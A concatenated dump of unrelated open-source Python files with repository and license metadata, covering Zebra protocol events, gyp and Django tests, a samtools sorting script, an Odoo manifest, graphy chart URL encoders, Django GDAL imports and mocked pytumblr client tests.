m = ', '.join(
['%s=%r' % (k, v)
for k, v in self.__dict__.items() if not k.startswith('_')])
return "%s(%s)" % (self.__class__.__name__, m)
__str__ = __repr__
def _event_name(body_cls):
return 'Event%s' % body_cls.__name__
def message_to_event(zclient, msg):
"""
Converts Zebra protocol message instance to Zebra protocol service
event instance.
If corresponding event class is not defined, returns None.
:param zclient: Zebra client instance.
:param msg: Zebra protocol message.
:return: Zebra protocol service event.
"""
if not isinstance(msg, zebra.ZebraMessage):
return None
body_cls = msg.get_body_class(msg.version, msg.command)
ev_cls = getattr(MOD, _event_name(body_cls), None)
if ev_cls is None:
return None
return ev_cls(zclient, msg)
def _define_event_class(body_cls):
name = _event_name(body_cls)
event_cls = type(name, (EventZebraBase,), {})
globals()[name] = event_cls
return event_cls
def _generate_event_classes():
for zebra_cls in zebra.__dict__.values():
if (not inspect.isclass(zebra_cls)
or not issubclass(zebra_cls, zebra._ZebraMessageBody)
or zebra_cls.__name__.startswith('_')):
continue
ev = _define_event_class(zebra_cls)
# LOG.debug('Generated Zebra event: %s' % ev)
ZEBRA_EVENTS.append(ev)
_generate_event_classes()
|
apache-2.0
|
bulldy80/gyp_unofficial
|
test/msvs/external_builder/gyptest-all.py
|
260
|
1878
|
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that msvs_external_builder being set will invoke the provided
msvs_external_builder_build_cmd and msvs_external_builder_clean_cmd, and will
not invoke MSBuild actions and rules.
"""
import os
import sys
import TestGyp
if int(os.environ.get('GYP_MSVS_VERSION', 0)) < 2010:
sys.exit(0)
test = TestGyp.TestGyp(formats=['msvs'], workdir='workarea_all')
# without the flag set
test.run_gyp('external.gyp')
test.build('external.gyp', target='external')
test.must_not_exist('external_builder.out')
test.must_exist('msbuild_rule.out')
test.must_exist('msbuild_action.out')
test.must_match('msbuild_rule.out', 'msbuild_rule.py hello.z a b c')
test.must_match('msbuild_action.out', 'msbuild_action.py x y z')
os.remove('msbuild_rule.out')
os.remove('msbuild_action.out')
# with the flag set, using Build
try:
os.environ['GYP_DEFINES'] = 'use_external_builder=1'
test.run_gyp('external.gyp')
test.build('external.gyp', target='external')
finally:
del os.environ['GYP_DEFINES']
test.must_not_exist('msbuild_rule.out')
test.must_not_exist('msbuild_action.out')
test.must_exist('external_builder.out')
test.must_match('external_builder.out', 'external_builder.py build 1 2 3')
os.remove('external_builder.out')
# with the flag set, using Clean
try:
os.environ['GYP_DEFINES'] = 'use_external_builder=1'
test.run_gyp('external.gyp')
test.build('external.gyp', target='external', clean=True)
finally:
del os.environ['GYP_DEFINES']
test.must_not_exist('msbuild_rule.out')
test.must_not_exist('msbuild_action.out')
test.must_exist('external_builder.out')
test.must_match('external_builder.out', 'external_builder.py clean 4 5')
os.remove('external_builder.out')
test.pass_test()
|
bsd-3-clause
|
qfma/ohnolog-dc
|
ase-estimation/parallel-bamsort-location.py
|
1
|
1424
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# parallel-bamsort-location.py
#==============================================================================
import argparse
import sys
import os
# Make utilities folder available
sys.path.append(os.path.abspath("../"))
from utilities.runner import exec_commands
from utilitis.io import list_files
#==============================================================================
#Command line options==========================================================
#==============================================================================
parser = argparse.ArgumentParser()
parser.add_argument("indir", type=str,
help="A directory containing input BAM files")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
#==============================================================================
def get_bam_files(files):
bam_files = []
for f in files:
file_name, file_extension = os.path.splitext(f)
if file_extension == ".bam":
bam_files.append(f)
return bam_files
def main():
files = list_files(args.indir)
bam_files = get_bam_files(files)
commands = []
for bam in bam_files:
outfile = bam.split(".")[0]+".loc.sorted"
commands.append(["samtools", "sort", bam, outfile])
exec_commands(commands)
if __name__ == "__main__":
main()
|
mit
|
michelts/lettuce
|
tests/integration/lib/Django-1.3/tests/regressiontests/inline_formsets/tests.py
|
51
|
6157
|
from django.forms.models import inlineformset_factory
from django.test import TestCase
from regressiontests.inline_formsets.models import Poet, Poem, School, Parent, Child
class DeletionTests(TestCase):
def test_deletion(self):
PoemFormSet = inlineformset_factory(Poet, Poem, can_delete=True)
poet = Poet.objects.create(name='test')
poem = poet.poem_set.create(name='test poem')
data = {
'poem_set-TOTAL_FORMS': u'1',
'poem_set-INITIAL_FORMS': u'1',
'poem_set-MAX_NUM_FORMS': u'0',
'poem_set-0-id': str(poem.pk),
'poem_set-0-poet': str(poet.pk),
'poem_set-0-name': u'test',
'poem_set-0-DELETE': u'on',
}
formset = PoemFormSet(data, instance=poet)
formset.save()
self.assertTrue(formset.is_valid())
self.assertEqual(Poem.objects.count(), 0)
def test_add_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoemFormSet = inlineformset_factory(Poet, Poem, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'poem_set-TOTAL_FORMS': u'1',
'poem_set-INITIAL_FORMS': u'0',
'poem_set-MAX_NUM_FORMS': u'0',
'poem_set-0-id': u'',
'poem_set-0-poem': u'1',
'poem_set-0-name': u'x' * 1000,
}
formset = PoemFormSet(data, instance=poet)
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poem.objects.count(), 0)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['poem_set-0-DELETE'] = 'on'
formset = PoemFormSet(data, instance=poet)
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poem.objects.count(), 0)
def test_change_form_deletion_when_invalid(self):
"""
Make sure that a change form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoemFormSet = inlineformset_factory(Poet, Poem, can_delete=True)
poet = Poet.objects.create(name='test')
poem = poet.poem_set.create(name='test poem')
data = {
'poem_set-TOTAL_FORMS': u'1',
'poem_set-INITIAL_FORMS': u'1',
'poem_set-MAX_NUM_FORMS': u'0',
'poem_set-0-id': unicode(poem.id),
'poem_set-0-poem': unicode(poem.id),
'poem_set-0-name': u'x' * 1000,
}
formset = PoemFormSet(data, instance=poet)
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poem.objects.count(), 1)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['poem_set-0-DELETE'] = 'on'
formset = PoemFormSet(data, instance=poet)
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poem.objects.count(), 0)
def test_save_new(self):
"""
Make sure inlineformsets respect commit=False
regression for #10750
"""
# exclude some required field from the forms
ChildFormSet = inlineformset_factory(School, Child, exclude=['father', 'mother'])
school = School.objects.create(name=u'test')
mother = Parent.objects.create(name=u'mother')
father = Parent.objects.create(name=u'father')
data = {
'child_set-TOTAL_FORMS': u'1',
'child_set-INITIAL_FORMS': u'0',
'child_set-MAX_NUM_FORMS': u'0',
'child_set-0-name': u'child',
}
formset = ChildFormSet(data, instance=school)
self.assertEqual(formset.is_valid(), True)
objects = formset.save(commit=False)
for obj in objects:
obj.mother = mother
obj.father = father
obj.save()
self.assertEqual(school.child_set.count(), 1)
class InlineFormsetFactoryTest(TestCase):
def test_inline_formset_factory(self):
"""
These should both work without a problem.
"""
inlineformset_factory(Parent, Child, fk_name='mother')
inlineformset_factory(Parent, Child, fk_name='father')
def test_exception_on_unspecified_foreign_key(self):
"""
Child has two ForeignKeys to Parent, so if we don't specify which one
to use for the inline formset, we should get an exception.
"""
self.assertRaisesRegexp(Exception,
"<class 'regressiontests.inline_formsets.models.Child'> has more than 1 ForeignKey to <class 'regressiontests.inline_formsets.models.Parent'>",
inlineformset_factory, Parent, Child
)
def test_fk_name_not_foreign_key_field_from_child(self):
"""
If we specify fk_name, but it isn't a ForeignKey from the child model
to the parent model, we should get an exception.
"""
self.assertRaises(Exception,
"fk_name 'school' is not a ForeignKey to <class 'regressiontests.inline_formsets.models.Parent'>",
inlineformset_factory, Parent, Child, fk_name='school'
)
def test_non_foreign_key_field(self):
"""
If the field specified in fk_name is not a ForeignKey, we should get an
exception.
"""
self.assertRaisesRegexp(Exception,
"<class 'regressiontests.inline_formsets.models.Child'> has no field named 'test'",
inlineformset_factory, Parent, Child, fk_name='test'
)
def test_any_iterable_allowed_as_argument_to_exclude(self):
# Regression test for #9171.
inlineformset_factory(
Parent, Child, exclude=['school'], fk_name='mother'
)
inlineformset_factory(
Parent, Child, exclude=('school',), fk_name='mother'
)
|
gpl-3.0
|
aaronsp777/radishdisplay
|
display/firmware/stamp_revision.py
|
1
|
1652
|
#!/usr/bin/python2.4
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extracts a revision string from stdin, and writes a header to stdout.
The generated header file defines two macro constants so that the compilied
code can be better optimized. These bytes are sent over the wire to identify
the firmware revision. The IDLOC macro programs the ID location in the pic,
which can be read by programmers and debuggers.
"""
import sre
import struct
import sys
# Example: "// $Revision: #5 $"
pattern = sre.compile(".*\\$Revision:\\s*#(\\d+)\\s*\\$")
revision = -1
for line in sys.stdin:
match = pattern.match(line)
if match:
# Add one, because that's the revision it'll be when committed
revision = int(match.group(1)) + 1
revision_string = struct.pack("<h", revision)
output = """
#ifndef HARDWARE_SIGNAGE_DISPLAY_REVISION_H__
#define HARDWARE_SIGNAGE_DISPLAY_REVISION_H__
#include <pic.h>
#define REVISION_LOW %d
#define REVISION_HIGH %d
__IDLOC(%04X);
#endif // HARDWARE_SIGNAGE_DISPLAY_REVISION_H__
""" % (ord(revision_string[0]), ord(revision_string[1]), revision)
sys.stdout.write(output)
|
apache-2.0
|
odoomrp/odoomrp-wip
|
purchase_landed_cost/__openerp__.py
|
8
|
1451
|
# -*- coding: utf-8 -*-
# Copyright 2013 Joaquín Gutierrez
# Copyright 2014-2017 Pedro M. Baeza <[email protected]>
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3
{
'name': 'Purchase landed costs - Alternative option',
'version': '8.0.2.5.0',
"author": "OdooMRP team,"
"AvanzOSC,"
"Tecnativa,"
"Joaquín Gutierrez",
'category': 'Purchase Management',
'website': 'http://www.odoomrp.com',
'summary': 'Purchase cost distribution',
'depends': [
'stock',
'purchase',
],
'data': [
'wizard/picking_import_wizard_view.xml',
'wizard/import_invoice_line_wizard_view.xml',
'wizard/import_landed_cost_pickings_wizard_view.xml',
'views/account_invoice_view.xml',
'views/purchase_cost_distribution_view.xml',
'views/purchase_cost_distribution_line_expense_view.xml',
'views/purchase_expense_type_view.xml',
'views/purchase_order_view.xml',
'views/stock_picking_view.xml',
'data/purchase_cost_distribution_sequence.xml',
'security/purchase_landed_cost_security.xml',
'security/ir.model.access.csv',
],
'installable': True,
'images': [
'/static/description/images/purchase_order_expense_main.png',
'/static/description/images/purchase_order_expense_line.png',
'/static/description/images/expenses_types.png',
],
}
|
agpl-3.0
|
renanrodm/namebench
|
nb_third_party/graphy/backends/google_chart_api/encoders.py
|
230
|
14800
|
#!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Display objects for the different kinds of charts.
Not intended for end users, use the methods in __init__ instead."""
import warnings
from graphy.backends.google_chart_api import util
class BaseChartEncoder(object):
"""Base class for encoders which turn chart objects into Google Chart URLS.
Object attributes:
extra_params: Dict to add/override specific chart params. Of the
form param:string, passed directly to the Google Chart API.
For example, 'cht':'lti' becomes ?cht=lti in the URL.
url_base: The prefix to use for URLs. If you want to point to a different
server for some reason, you would override this.
formatters: TODO: Need to explain how these work, and how they are
different from chart formatters.
enhanced_encoding: If True, uses enhanced encoding. If
False, simple encoding is used.
escape_url: If True, URL will be properly escaped. If False, characters
like | and , will be unescapped (which makes the URL easier to
read).
"""
def __init__(self, chart):
self.extra_params = {} # You can add specific params here.
self.url_base = 'http://chart.apis.google.com/chart'
self.formatters = self._GetFormatters()
self.chart = chart
self.enhanced_encoding = False
self.escape_url = True # You can turn off URL escaping for debugging.
self._width = 0 # These are set when someone calls Url()
self._height = 0
def Url(self, width, height, use_html_entities=False):
"""Get the URL for our graph.
Args:
use_html_entities: If True, reserved HTML characters (&, <, >, ") in the
URL are replaced with HTML entities (&, <, etc.). Default is False.
"""
self._width = width
self._height = height
params = self._Params(self.chart)
return util.EncodeUrl(self.url_base, params, self.escape_url,
use_html_entities)
def Img(self, width, height):
"""Get an image tag for our graph."""
url = self.Url(width, height, use_html_entities=True)
tag = '<img src="%s" width="%s" height="%s" alt="chart"/>'
return tag % (url, width, height)
def _GetType(self, chart):
"""Return the correct chart_type param for the chart."""
raise NotImplementedError
def _GetFormatters(self):
"""Get a list of formatter functions to use for encoding."""
formatters = [self._GetLegendParams,
self._GetDataSeriesParams,
self._GetColors,
self._GetAxisParams,
self._GetGridParams,
self._GetType,
self._GetExtraParams,
self._GetSizeParams,
]
return formatters
def _Params(self, chart):
"""Collect all the different params we need for the URL. Collecting
all params as a dict before converting to a URL makes testing easier.
"""
chart = chart.GetFormattedChart()
params = {}
def Add(new_params):
params.update(util.ShortenParameterNames(new_params))
for formatter in self.formatters:
Add(formatter(chart))
for key in params:
params[key] = str(params[key])
return params
def _GetSizeParams(self, chart):
"""Get the size param."""
return {'size': '%sx%s' % (int(self._width), int(self._height))}
def _GetExtraParams(self, chart):
"""Get any extra params (from extra_params)."""
return self.extra_params
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
y_min, y_max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
series_data = []
markers = []
for i, series in enumerate(chart.data):
data = series.data
if not data: # Drop empty series.
continue
series_data.append(data)
for x, marker in series.markers:
args = [marker.shape, marker.color, i, x, marker.size]
markers.append(','.join(str(arg) for arg in args))
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, series_data, y_min, y_max, encoder)
result.update(util.JoinLists(marker = markers))
return result
def _GetColors(self, chart):
"""Color series color parameter."""
colors = []
for series in chart.data:
if not series.data:
continue
colors.append(series.style.color)
return util.JoinLists(color = colors)
def _GetDataEncoder(self, chart):
"""Get a class which can encode the data the way the user requested."""
if not self.enhanced_encoding:
return util.SimpleDataEncoder()
return util.EnhancedDataEncoder()
def _GetLegendParams(self, chart):
"""Get params for showing a legend."""
if chart._show_legend:
return util.JoinLists(data_series_label = chart._legend_labels)
return {}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Return axis.labels & axis.label_positions."""
return axis.labels, axis.label_positions
def _GetAxisParams(self, chart):
"""Collect params related to our various axes (x, y, right-hand)."""
axis_types = []
axis_ranges = []
axis_labels = []
axis_label_positions = []
axis_label_gridlines = []
mark_length = max(self._width, self._height)
for i, axis_pair in enumerate(a for a in chart._GetAxes() if a[1].labels):
axis_type_code, axis = axis_pair
axis_types.append(axis_type_code)
if axis.min is not None or axis.max is not None:
assert axis.min is not None # Sanity check: both min & max must be set.
assert axis.max is not None
axis_ranges.append('%s,%s,%s' % (i, axis.min, axis.max))
labels, positions = self._GetAxisLabelsAndPositions(axis, chart)
if labels:
axis_labels.append('%s:' % i)
axis_labels.extend(labels)
if positions:
positions = [i] + list(positions)
axis_label_positions.append(','.join(str(x) for x in positions))
if axis.label_gridlines:
axis_label_gridlines.append("%d,%d" % (i, -mark_length))
return util.JoinLists(axis_type = axis_types,
axis_range = axis_ranges,
axis_label = axis_labels,
axis_position = axis_label_positions,
axis_tick_marks = axis_label_gridlines,
)
def _GetGridParams(self, chart):
"""Collect params related to grid lines."""
x = 0
y = 0
if chart.bottom.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.bottom.min is not None)
assert(chart.bottom.max is not None)
total = float(chart.bottom.max - chart.bottom.min)
x = 100 * chart.bottom.grid_spacing / total
if chart.left.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.left.min is not None)
assert(chart.left.max is not None)
total = float(chart.left.max - chart.left.min)
y = 100 * chart.left.grid_spacing / total
if x or y:
return dict(grid = '%.3g,%.3g,1,0' % (x, y))
return {}
class LineChartEncoder(BaseChartEncoder):
"""Helper class to encode LineChart objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lc'}
def _GetLineStyles(self, chart):
"""Get LineStyle parameters."""
styles = []
for series in chart.data:
style = series.style
if style:
styles.append('%s,%s,%s' % (style.width, style.on, style.off))
else:
# If one style is missing, they must all be missing
# TODO: Add a test for this; throw a more meaningful exception
assert (not styles)
return util.JoinLists(line_style = styles)
def _GetFormatters(self):
out = super(LineChartEncoder, self)._GetFormatters()
out.insert(-2, self._GetLineStyles)
return out
class SparklineEncoder(LineChartEncoder):
"""Helper class to encode Sparkline objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lfi'}
class BarChartEncoder(BaseChartEncoder):
"""Helper class to encode BarChart objects into Google Chart URLs."""
__STYLE_DEPRECATION = ('BarChart.display.style is deprecated.' +
' Use BarChart.style, instead.')
def __init__(self, chart, style=None):
"""Construct a new BarChartEncoder.
Args:
style: DEPRECATED. Set style on the chart object itself.
"""
super(BarChartEncoder, self).__init__(chart)
if style is not None:
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
chart.style = style
def _GetType(self, chart):
# Vertical Stacked Type
types = {(True, False): 'bvg',
(True, True): 'bvs',
(False, False): 'bhg',
(False, True): 'bhs'}
return {'chart_type': types[(chart.vertical, chart.stacked)]}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Reverse labels on the y-axis in horizontal bar charts.
(Otherwise the labels come out backwards from what you would expect)
"""
if not chart.vertical and axis == chart.left:
# The left axis of horizontal bar charts needs to have reversed labels
return reversed(axis.labels), reversed(axis.label_positions)
return axis.labels, axis.label_positions
def _GetFormatters(self):
out = super(BarChartEncoder, self)._GetFormatters()
# insert at -2 to allow extra_params to overwrite everything
out.insert(-2, self._ZeroPoint)
out.insert(-2, self._ApplyBarChartStyle)
return out
def _ZeroPoint(self, chart):
"""Get the zero-point if any bars are negative."""
# (Maybe) set the zero point.
min, max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
out = {}
if min < 0:
if max < 0:
out['chp'] = 1
else:
out['chp'] = -min/float(max - min)
return out
def _ApplyBarChartStyle(self, chart):
"""If bar style is specified, fill in the missing data and apply it."""
# sanity checks
if chart.style is None or not chart.data:
return {}
(bar_thickness, bar_gap, group_gap) = (chart.style.bar_thickness,
chart.style.bar_gap,
chart.style.group_gap)
# Auto-size bar/group gaps
if bar_gap is None and group_gap is not None:
bar_gap = max(0, group_gap / 2)
if not chart.style.use_fractional_gap_spacing:
bar_gap = int(bar_gap)
if group_gap is None and bar_gap is not None:
group_gap = max(0, bar_gap * 2)
# Set bar thickness to auto if it is missing
if bar_thickness is None:
if chart.style.use_fractional_gap_spacing:
bar_thickness = 'r'
else:
bar_thickness = 'a'
else:
# Convert gap sizes to pixels if needed
if chart.style.use_fractional_gap_spacing:
if bar_gap:
bar_gap = int(bar_thickness * bar_gap)
if group_gap:
group_gap = int(bar_thickness * group_gap)
# Build a valid spec; ignore group gap if chart is stacked,
# since there are no groups in that case
spec = [bar_thickness]
if bar_gap is not None:
spec.append(bar_gap)
if group_gap is not None and not chart.stacked:
spec.append(group_gap)
return util.JoinLists(bar_size = spec)
def __GetStyle(self):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
return self.chart.style
def __SetStyle(self, value):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
self.chart.style = value
style = property(__GetStyle, __SetStyle, __STYLE_DEPRECATION)
class PieChartEncoder(BaseChartEncoder):
"""Helper class for encoding PieChart objects into Google Chart URLs.
Fuzzy frogs frolic in the forest.
Object Attributes:
is3d: if True, draw a 3d pie chart. Default is False.
"""
def __init__(self, chart, is3d=False, angle=None):
"""Construct a new PieChartEncoder.
Args:
is3d: If True, draw a 3d pie chart. Default is False. If the pie chart
includes multiple pies, is3d must be set to False.
angle: Angle of rotation of the pie chart, in radians.
"""
super(PieChartEncoder, self).__init__(chart)
self.is3d = is3d
self.angle = None
def _GetFormatters(self):
"""Add a formatter for the chart angle."""
formatters = super(PieChartEncoder, self)._GetFormatters()
formatters.append(self._GetAngleParams)
return formatters
def _GetType(self, chart):
if len(chart.data) > 1:
if self.is3d:
warnings.warn(
'3d charts with more than one pie not supported; rendering in 2d',
RuntimeWarning, stacklevel=2)
chart_type = 'pc'
else:
if self.is3d:
chart_type = 'p3'
else:
chart_type = 'p'
return {'chart_type': chart_type}
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
pie_points = []
labels = []
max_val = 1
for pie in chart.data:
points = []
for segment in pie:
if segment:
points.append(segment.size)
max_val = max(max_val, segment.size)
labels.append(segment.label or '')
if points:
pie_points.append(points)
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, pie_points, 0, max_val, encoder)
result.update(util.JoinLists(label=labels))
return result
def _GetColors(self, chart):
if chart._colors:
# Colors were overridden by the user
colors = chart._colors
else:
# Build the list of colors from individual segments
colors = []
for pie in chart.data:
for segment in pie:
if segment and segment.color:
colors.append(segment.color)
return util.JoinLists(color = colors)
def _GetAngleParams(self, chart):
"""If the user specified an angle, add it to the params."""
if self.angle:
return {'chp' : str(self.angle)}
return {}
|
apache-2.0
|
tayfun/django
|
django/contrib/gis/gdal/__init__.py
|
327
|
2635
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existent file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
from django.contrib.gis.gdal.error import ( # NOQA
GDALException, OGRException, OGRIndexError, SRSException, check_err,
)
from django.contrib.gis.gdal.geomtype import OGRGeomType # NOQA
__all__ = [
'check_err', 'GDALException', 'OGRException', 'OGRIndexError',
'SRSException', 'OGRGeomType', 'HAS_GDAL',
]
# Attempting to import objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver # NOQA
from django.contrib.gis.gdal.datasource import DataSource # NOQA
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, GDAL_VERSION # NOQA
from django.contrib.gis.gdal.raster.source import GDALRaster # NOQA
from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform # NOQA
from django.contrib.gis.gdal.geometries import OGRGeometry # NOQA
HAS_GDAL = True
__all__ += [
'Driver', 'DataSource', 'gdal_version', 'gdal_full_version',
'GDALRaster', 'GDAL_VERSION', 'SpatialReference', 'CoordTransform',
'OGRGeometry',
]
except GDALException:
HAS_GDAL = False
try:
from django.contrib.gis.gdal.envelope import Envelope
__all__ += ['Envelope']
except ImportError:
# No ctypes, but don't raise an exception.
pass
|
bsd-3-clause
|
socrateslee/pytumblr
|
tests/test_pytumblr.py
|
1
|
12769
|
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
import unittest
import mock
import json
import pytumblr
from urllib.parse import parse_qs
import sys
if sys.version_info < (2, 7):
# python 2.6 may show ssl warnings, which we don't care about for these tests
import urllib3
urllib3.disable_warnings()
def wrap_response(response_text):
def inner(*args, **kwargs):
mp = mock.MagicMock()
mp.json.return_value = json.loads(response_text)
return mp
return inner
def wrap_response_storing_data(response_text, store):
def inner(*args, **kwargs):
# store data for assertion on input
store.data = kwargs.get('data')
mp = mock.MagicMock()
mp.json.return_value = json.loads(response_text)
return mp
return inner
class TumblrRestClientTest(unittest.TestCase):
"""
"""
def setUp(self):
with open('tests/tumblr_credentials.json', 'r') as f:
credentials = json.loads(f.read())
self.client = pytumblr.TumblrRestClient(credentials['consumer_key'], credentials['consumer_secret'], credentials['oauth_token'], credentials['oauth_token_secret'])
@mock.patch('requests.get')
def test_dashboard(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.dashboard()
assert response['posts'] == []
@mock.patch('requests.get')
def test_posts(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.posts('codingjester.tumblr.com')
assert response['posts'] == []
@mock.patch('requests.get')
def test_posts_with_type(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.posts('seejohnrun', 'photo')
assert response['posts'] == []
@mock.patch('requests.get')
def test_posts_with_type_and_arg(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
args = {'limit': 1}
response = self.client.posts('seejohnrun', 'photo', **args)
assert response['posts'] == []
@mock.patch('requests.get')
def test_blogInfo(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"blog": {} } }')
response = self.client.blog_info('codingjester.tumblr.com')
assert response['blog'] == {}
@mock.patch('requests.get')
def test_avatar_with_301(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 301, "msg": "Moved Permanently"}, "response": {"avatar_url": "" } }')
response = self.client.avatar('staff.tumblr.com')
assert response['avatar_url'] == ''
@mock.patch('requests.get')
def test_avatar_with_302(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 302, "msg": "Found"}, "response": {"avatar_url": "" } }')
response = self.client.avatar('staff.tumblr.com')
assert response['avatar_url'] == ''
@mock.patch('requests.get')
def test_followers(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"users": [] } }')
response = self.client.followers('codingjester.tumblr.com')
assert response['users'] == []
@mock.patch('requests.get')
def test_blog_following(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"blogs": [], "total_blogs": 1}}')
response = self.client.blog_following('pytblr.tumblr.com')
assert response['blogs'] == []
@mock.patch('requests.get')
def test_blogLikes(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"liked_posts": [] } }')
response = self.client.blog_likes('codingjester.tumblr.com')
assert response['liked_posts'] == []
@mock.patch('requests.get')
def test_blogLikes_with_after(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"liked_posts": [] } }')
response = self.client.blog_likes('codingjester.tumblr.com', after=1418684291)
assert response['liked_posts'] == []
@mock.patch('requests.get')
def test_blogLikes_with_before(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"liked_posts": [] } }')
response = self.client.blog_likes('codingjester.tumblr.com', before=1418684291)
assert response['liked_posts'] == []
@mock.patch('requests.get')
def test_queue(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.queue('codingjester.tumblr.com')
assert response['posts'] == []
@mock.patch('requests.get')
def test_drafts(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.drafts('codingjester.tumblr.com')
assert response['posts'] == []
@mock.patch('requests.get')
def test_submissions(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": {"posts": [] } }')
response = self.client.submission('codingjester.tumblr.com')
assert response['posts'] == []
@mock.patch('requests.post')
def test_follow(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.follow("codingjester.tumblr.com")
assert response == []
assert parse_qs(mock_post.data) == parse_qs('url=codingjester.tumblr.com')
@mock.patch('requests.post')
def test_unfollow(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.unfollow("codingjester.tumblr.com")
assert response == []
assert parse_qs(mock_post.data) == parse_qs('url=codingjester.tumblr.com')
@mock.patch('requests.post')
def test_reblog(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.reblog('seejohnrun', id='123', reblog_key="adsfsadf", state='coolguy', tags=['hello', 'world'])
assert response == []
assert parse_qs(mock_post.data) == parse_qs('state=coolguy&reblog_key=adsfsadf&id=123&tags=hello%2Cworld')
@mock.patch('requests.post')
def test_edit_post(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
